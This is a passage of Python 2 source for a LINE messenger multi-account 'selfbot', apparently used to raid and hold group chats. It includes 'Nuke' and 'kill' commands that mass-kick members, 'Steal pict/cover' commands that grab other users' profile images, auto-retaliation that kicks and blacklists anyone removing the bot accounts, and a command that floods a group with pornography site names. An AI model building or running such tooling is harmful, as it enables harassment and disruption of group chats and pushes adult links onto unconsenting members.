r = requests.get('https://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
cl.sendMessage(msg.to, song[4])
elif ".Youtube " in msg.text:
query = msg.text.replace(".Youtube ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list' not in a['href']:
cl.sendText(msg.to,'http://www.youtube.com' + a['href'] + a['title'])
elif "Block @" in msg.text:
if msg.toType == 2:
print "[block] OK"
_name = msg.text.replace("Block @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.blockContact(target)
cl.sendText(msg.to, "Success block contact~")
except Exception as e:
print e
elif msg.text.lower() == 'blocklist':
blockedlist = cl.getBlockedContactIds()
cl.sendText(msg.to, "Please wait...")
kontak = cl.getContacts(blockedlist)
num=1
msgs="User Blocked List\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
cl.sendText(msg.to, msgs)
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
#===============================================
elif msg.text in ["Invite","ดึง"]:
if msg.from_ in admin:
wait["ricoinvite"] = True
random.choice(KAC).sendText(msg.to,"send contact 😉")
elif ("Cek " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendText(msg.to,"Mid:" + key1)
elif "Mid @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
elif msg.text in ["Mid","ไอดี"]:
cl.sendText(msg.to,mid)
elif msg.text in ["Link on","เปิดลิ้ง"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = False
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL open")
else:
cl.sendText(msg.to,"URL open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group ô€œô€„‰👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œô€„‰")
elif msg.text in ["Link off","ปิดลิ้ง"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = True
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL close👈")
else:
cl.sendText(msg.to,"URL close👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group 👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œ")
elif msg.text in ["url","Url"]:
if msg.toType == 2:
g = cl.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
cl.updateGroup(g)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok")
else:
cl.sendText(msg.to,"Tidak dapat digunakan untuk kelompok selain")
elif msg.text in ["Gurl","ลิ้ง"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["S1glist"]:
gs = ki.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki.getGroup(i).name + " | [ " + str(len (ki.getGroup(i).members)) + " ]")
ki.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S2glist"]:
gs = ki2.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki2.getGroup(i).name + " | [ " + str(len (ki2.getGroup(i).members)) + " ]")
ki2.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S3glist"]:
gs = ki3.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki3.getGroup(i).name + " | [ " + str(len (ki3.getGroup(i).members)) + " ]")
ki3.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S4glist"]:
gs = ki4.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki4.getGroup(i).name + " | [ " + str(len (ki4.getGroup(i).members)) + " ]")
ki4.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S5glist"]:
gs = ki5.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[���] %s \n" % (ki5.getGroup(i).name + " | [ " + str(len (ki5.getGroup(i).members)) + " ]")
ki5.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text == "ลิ้ง":
ki.sendText(msg.to,"nekopoi.host")
ki.sendText(msg.to,"sexvideobokep.com")
ki.sendText(msg.to,"memek.com")
ki.sendText(msg.to,"pornktube.com")
ki.sendText(msg.to,"faketaxi.com")
ki.sendText(msg.to,"videojorok.com")
ki.sendText(msg.to,"watchmygf.mobi")
ki.sendText(msg.to,"xnxx.com")
ki.sendText(msg.to,"pornhd.com")
ki.sendText(msg.to,"xvideos.com")
ki.sendText(msg.to,"vidz7.com")
ki.sendText(msg.to,"m.xhamster.com")
ki.sendText(msg.to,"xxmovies.pro")
ki.sendText(msg.to,"youporn.com")
ki.sendText(msg.to,"pornhub.com")
ki.sendText(msg.to,"anyporn.com")
ki.sendText(msg.to,"hdsexdino.com")
ki.sendText(msg.to,"rubyourdick.com")
ki.sendText(msg.to,"anybunny.mobi")
ki.sendText(msg.to,"cliphunter.com")
ki.sendText(msg.to,"sexloving.net")
ki.sendText(msg.to,"free.goshow.tv")
ki.sendText(msg.to,"eporner.com")
ki.sendText(msg.to,"Pornhd.josex.net")
ki.sendText(msg.to,"m.hqporner.com")
ki.sendText(msg.to,"m.spankbang.com")
ki.sendText(msg.to,"m.4tube.com")
ki.sendText(msg.to,"brazzers.com")
#-----------------------------------------------------------
elif "#leave" in msg.text:
try:
import sys
sys.exit()
except:
pass
#-----------------------------------------------------------
elif "Speed" in msg.text:
start = time.time()
cl.sendText(msg.to, "ᴘʀᴏɢʀᴇss...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
ki3.sendText(msg.to, "%sseconds" % (elapsed_time))
ki4.sendText(msg.to, "%sseconds" % (elapsed_time))
ki5.sendText(msg.to, "%sseconds" % (elapsed_time))
#-----------------------------------------------
elif "Sp" in msg.text:
start = time.time()
cl.sendText(msg.to, "ᴘʀᴏɢʀᴇss...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
#-----------------------------------------------
elif msg.text.lower() == 'respons':
profile = ki.getProfile()
text = profile.displayName
ki.sendText(msg.to, text)
profile = ki2.getProfile()
text = profile.displayName
ki2.sendText(msg.to, text)
profile = ki3.getProfile()
text = profile.displayName
ki3.sendText(msg.to, text)
profile = ki4.getProfile()
text = profile.displayName
ki4.sendText(msg.to, text)
profile = ki5.getProfile()
text = profile.displayName
ki5.sendText(msg.to, text)
#------------------------------------------------------------------
elif "Steal home @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Steal home @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#------------------------------------------------------------------
elif "Blacklist @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[BL]ok"
_name = msg.text.replace("Blacklist @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Boss")
except:
cl.sendText(msg.to,"Error")
elif "Blacklist all" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Blacklist all","")
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Semua Telah Di Hapus")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Maaf")
else:
for target in targets:
if not target in Bots:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Boss")
except:
cl.sendText(msg.to,"Berhasil Dihapus")
elif "Whitelist @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[WL]ok"
_name = msg.text.replace("Whitelist @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Boss")
except:
cl.sendText(msg.to,"There was no blacklist user")
elif "Blacklist: " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Blacklist: ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Locked")
except:
cl.sendText(msg.to,"Error")
elif "Whitelist: " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Whitelist: ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif msg.text in ["cb","���้างดำ"]:
if msg.from_ in admin:
wait["blacklist"] = {}
cl.sendText(msg.to,"clear")
elif msg.text in ["Whitelist","ขาว"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Blacklist","ดำ"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Banlist","เชคดำ"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Nothing double thumbs up")
else:
cl.sendText(msg.to,"Daftar Banlist")
mc = "[⎈]Blacklist [⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
elif msg.text in ["Ban cek","Cekban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = "[⎈]Mid Blacklist [⎈]"
for mm in matched_list:
cocoa += "\n" + mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text.lower() == 'kill':
if msg.from_ in admin:
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
cl.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
ki2.kickoutFromGroup(msg.to,[jj])
ki3.kickoutFromGroup(msg.to,[jj])
ki4.kickoutFromGroup(msg.to,[jj])
ki5.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif "Nuke" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Nuke","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
cl.sendText(msg.to,"Masih Mauko Sundala")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Tidak ada Member")
ki2.sendText(msg.to,"Nothing Bosqu")
else:
for target in targets:
if not target in Bots:
try:
klist=[ki,ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Hahaha")
ki2.sendText(msg.to,"Fakyu Sundala")
#-----------------------------------------------
#-----------------------------------------------
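# The join helpers below ("Kicker", "Sayang"/"All join", "spcome", "As1 in".."As5 in")
# all follow the same pattern: temporarily clear preventJoinByTicket on the group,
# reissue a group ticket, let the assist accounts join via that ticket, then lock the
# group again.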
elif "Kicker" in msg.text:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
ki2.acceptGroupInvitationByTicket(msg.to,Ti)
ki3.acceptGroupInvitationByTicket(msg.to,Ti)
ki4.acceptGroupInvitationByTicket(msg.to,Ti)
ki5.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#-----------------------------------------------
elif msg.text in ["Sayang","Kuy","All join","Minna"]:
if msg.from_ in admsa:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket = True
ki.updateGroup(G)
elif msg.text.lower() == 'spcome':
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket = True
ki.updateGroup(G)
#-----------------------------------------------
elif "As1 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket = True
ki.updateGroup(G)
#-----------------------------------------------
elif "As2 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket = True
ki2.updateGroup(G)
#-----------------------------------------------
elif "As3 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket = True
ki3.updateGroup(G)
#-----------------------------------------------
elif "As4 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki4.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket = True
ki4.updateGroup(G)
#-----------------------------------------------
elif "As5 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket = True
ki5.updateGroup(G)
#-----------------------------------------------
elif msg.text in ["คิกออก","Bye","กุเกลียดมึง","Sayonara"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.sendText(msg.to,"ไปก็ได้ บ๊ายบาย " + str(ginfo.name) + "")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As1 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As2 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki2.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As3 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki3.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As4 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki4.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As5 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif msg.text in ["Welcome","wc","welcome","Wc"]:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"ยินดีต้อนรับสู่กลุ่ม " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#-----------------------------------------------
#-----------------------------------------------
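# op.type 19 appears to be the kick notification: if one of the bot accounts
# (op.param3) was removed, another account reopens the group by ticket so every
# account can rejoin, and in most branches the kicker (op.param2) is kicked back
# and/or added to the blacklist before the group is locked again.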
if op.type == 19:
try:
if op.param3 in mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
ki.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = ki2.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
elif op.param3 in ki3mid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
elif op.param3 in ki2mid:
if op.param2 in ki3mid:
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki3.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
elif op.param3 in ki4mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki5mid:
if op.param2 in ki4mid:
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
else:
G = ki4.getGroup(op.param1)
ki4.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
